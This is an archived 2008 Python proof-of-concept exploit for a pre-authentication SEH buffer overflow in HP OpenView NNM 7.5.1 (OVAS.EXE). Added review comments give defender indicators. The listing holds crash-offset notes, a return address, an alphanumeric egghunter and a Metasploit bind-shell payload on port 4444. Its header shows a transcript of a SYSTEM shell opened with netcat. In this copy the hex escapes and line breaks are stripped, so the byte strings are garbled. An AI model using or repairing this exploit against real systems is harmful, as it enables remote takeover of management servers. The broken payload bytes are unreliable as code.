
hpopenviewnnm-overflow.txt

Posted on 03 April 2008

# NOTE(review): archived 2008 proof-of-concept listing for the HP OpenView NNM 7.5.1
# OVAS.EXE pre-authentication SEH overflow described in the header below. It is
# Python 2 (`print` statements) and, in this copy, every hex escape reads as `x41`
# rather than `\x41` and the HTTP header separators show no `\r\n` -- the backslashes
# appear to have been lost when the page was extracted, so the byte strings below
# (e.g. `"xeb"*1101`, the egghunter/bindshell blocks) no longer encode what the
# original comments describe. Treat this as documentation of the technique, not a
# runnable artefact.
#
# What the script does (from the visible code): opens a TCP connection to a
# hard-coded address on port 7510, sends one oversized GET whose request-target is
# several kilobytes of filler followed by `/topology/homeBaseView`, with a declared
# `Content-Length: 1048580` far larger than the body actually sent, and then closes
# the socket; the payload is a bind shell on TCP/4444 (transcript in the header
# shows it running as NT AUTHORITY\SYSTEM, i.e. the NNM service privilege level).
#
# Defender notes: the observable signature is a single very long request-target to
# the NNM web port (7510) with a wildly inflated Content-Length, which network IDS
# or a reverse proxy in front of the console can flag before it reaches ovas.exe;
# host-side, an unexpected listener on 4444 or a shell spawned under the NNM service
# account is the post-exploitation indicator. Apply the vendor fix for this
# product version and restrict access to the management console port to admin
# networks; the issue is pre-authentication, so credentials do not mitigate it.
#!/usr/bin/python ################################################################################ # HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow # Tested on Windows 2003 Server SP1. # Coded by Mati Aharoni # muts..at..offensive-security.com # http://www.offensive-security.com/0day/hp-nnm-ov.py.txt # [shameless plug] # This vulnerability was found, analysed and exploited # as part of a training module in "BackTrack to the Max". # http://www.offensive-security.com/ilt.php # [/shameless plug] ################################################################################# # bt 0day# python hp-nnm-ov.py # [*] HP NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit (0day) # [*] http://www.offensive-security.com # [*] Sending evil HTTP request to NNMz, ph33r # [*] Egghunter working ... # [*] Check payload results - may take up to a minute. # bt 0day# nc -v 192.168.1.111 4444 # (muts) [192.168.1.111] 4444 (krb524) open # Microsoft Windows [Version 5.2.3790] # (C) Copyright 1985-2003 Microsoft Corp. # # C:>whoami # whoami # nt authoritysystem # # C:> # ################################################################################ # Insane, "We own all those registers, but how the heck do we get EIP" method. ################################################################################ # crash = "T"*1300 # ################################################################################# # Funky, "Lets make the stack happy and pray for EIP" overwrite method. 
# NOTE(review): the lines above and below were collapsed onto single physical lines
# by the page extraction; the original file had one statement/comment per line.
################################################################################# # Case 1 - Stack not happy: # crash = "T"*989 # # Case 2 - Stack happy, we own EIP - blessed by the angels above: # 0x44442638 - Happy NNM address # crash = "T"*941 +"x38x26x44x44"+"x42x42x42x42" +"T"*12 +"x41x41x41x41" + "T"*24+":7510"+"x41x41x41x41" + "B"*24+":7510" # 12 bytes of nasty strict alphanum shellcode possibility @EBP # ################################################################################ # Unknown "wtf, these bytes are expanding" SEH method: ################################################################################ # 0x6d356c6e - POP POP RET somewhere in NNM # crash = "xeb"*1100+"A"*9+"x41x41x41x41"+"A"*1900+":7510" # ################################################################################ # Final exploit crash SEH method: ################################################################################ # crash = "xeb"*1101 +"x41x41x41x41x77x21x6ex6cx35x6d" + "G"*32 + egghunter +"A"*100+":7510" # ################################################################################ import socket import os import sys print "[*] HP NNM 7.5.1 OVAS.exe SEH Overflow Exploit (0day)" print "[*] http://www.offensive-security.com" # Alphanumeric egghunter shellcode + restricted chars x40x3fx3ax2f - ph33r # One egg to rule them all. egghunter=( "%JMNU%521*TX-1MUU-1KUU-5QUUPAA%J" "MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5" "21*-q!au-q!au-oGSePAA%JMNU%521*-D" "A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1" "z1E-oRHEPAA%JMNU%521*-3s1--331--^" "TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA" "A%JMNU%521*-R222-1111-nZJ2PAA%JMN" "U%521*-1-wD-1-wD-8$GwP") alignstack="x90"*34+"x83xc4x03" # win32_bind - EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com # Spawned shell dies quickly as a result of a parent thread killing it. # Best shellcodes are of the "instant" type, such as adduser, etc. 
# NOTE(review): `bindshell` is the Metasploit-generated payload named in the comment
# above, prefixed by the "T00WT00W" egg tag the egghunter searches for and the
# stack-alignment stub; with the escapes lost in this copy it is plain ASCII, not
# the byte sequence the generator emitted.
bindshell=("T00WT00W" + alignstack + "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e" "x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48" "x4ex46x46x32x46x42x4bx48x45x54x4ex33x4bx38x4ex37" "x45x30x4ax37x41x30x4fx4ex4bx38x4fx54x4ax41x4bx48" "x4fx35x42x32x41x50x4bx4ex49x34x4bx58x46x43x4bx58" "x41x30x50x4ex41x33x42x4cx49x49x4ex4ax46x48x42x4c" "x46x47x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e" "x46x4fx4bx53x46x55x46x32x4ax32x45x37x45x4ex4bx48" "x4fx35x46x52x41x30x4bx4ex48x46x4bx58x4ex30x4bx54" "x4bx58x4fx35x4ex51x41x50x4bx4ex43x50x4ex32x4bx38" "x49x58x4ex46x46x52x4ex31x41x56x43x4cx41x53x4bx4d" "x46x46x4bx58x43x44x42x33x4bx38x42x54x4ex30x4bx48" "x42x47x4ex51x4dx4ax4bx48x42x34x4ax50x50x35x4ax36" "x50x38x50x54x50x50x4ex4ex42x35x4fx4fx48x4dx48x56" "x43x55x48x56x4ax46x43x53x44x43x4ax36x47x57x43x57" "x44x33x4fx35x46x55x4fx4fx42x4dx4ax56x4bx4cx4dx4e" "x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx45x49x38x45x4e" "x48x56x41x38x4dx4ex4ax50x44x30x45x45x4cx46x44x30" "x4fx4fx42x4dx4ax46x49x4dx49x50x45x4fx4dx4ax47x55" "x4fx4fx48x4dx43x55x43x55x43x55x43x55x43x45x43x44" "x43x35x43x54x43x55x4fx4fx42x4dx48x36x4ax46x41x31" "x4ex55x48x46x43x55x49x58x41x4ex45x59x4ax56x46x4a" "x4cx51x42x37x47x4cx47x35x4fx4fx48x4dx4cx56x42x51" "x41x35x45x45x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x32" "x49x4ex47x35x4fx4fx48x4dx43x35x45x35x4fx4fx42x4d" "x4ax56x45x4ex49x34x48x48x49x44x47x45x4fx4fx48x4d" "x42x55x46x55x46x35x45x45x4fx4fx42x4dx43x59x4ax46" "x47x4ex49x57x48x4cx49x37x47x55x4fx4fx48x4dx45x45" "x4fx4fx42x4dx48x56x4cx56x46x56x48x46x4ax46x43x56" "x4dx36x49x58x45x4ex4cx56x42x45x49x45x49x42x4ex4c" "x49x38x47x4ex4cx36x46x44x49x38x44x4ex41x33x42x4c" "x43x4fx4cx4ax50x4fx44x54x4dx52x50x4fx44x44x4ex32" "x43x39x4dx38x4cx37x4ax43x4bx4ax4bx4ax4bx4ax4ax46" "x44x57x50x4fx43x4bx48x41x4fx4fx45x57x46x44x4fx4f" 
"x48x4dx4bx35x47x45x44x55x41x55x41x55x41x35x4cx56" "x41x50x41x55x41x45x45x35x41x45x4fx4fx42x4dx4ax56" "x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx36" "x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx38x47x55x4ex4f" "x43x48x46x4cx46x56x4fx4fx48x4dx44x55x4fx4fx42x4d" "x4ax56x4fx4ex50x4cx42x4ex42x56x43x35x4fx4fx48x4d" "x4fx4fx42x4dx5a") # 0x6d356c6e pop pot ret somehwere in NNM 7.5.1 evilcrash = "xeb"*1101 + "x41x41x41x41x77x21x6ex6cx35x6d" + "G"*32 +egghunter + "A"*100 + ":7510" buffer="GET http://" + evilcrash+ "/topology/homeBaseView HTTP/1.1 " buffer+="Content-Type: application/x-www-form-urlencoded " buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03 " buffer+="Content-Length: 1048580 " buffer+= bindshell print "[*] Sending evil HTTP request to NNMz, ph33r" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("192.168.1.111", 7510)) expl.send(buffer) expl.close() print "[*] Egghunter working ..." print "[*] Check payload results - may take up to a minute."
# NOTE(review): the target address and port are hard-coded above (no argument
# parsing), the connect/send calls have no error handling, and the script prints
# success messages unconditionally -- the "Egghunter working" line is not a result
# check, just a print after the socket is closed.

 
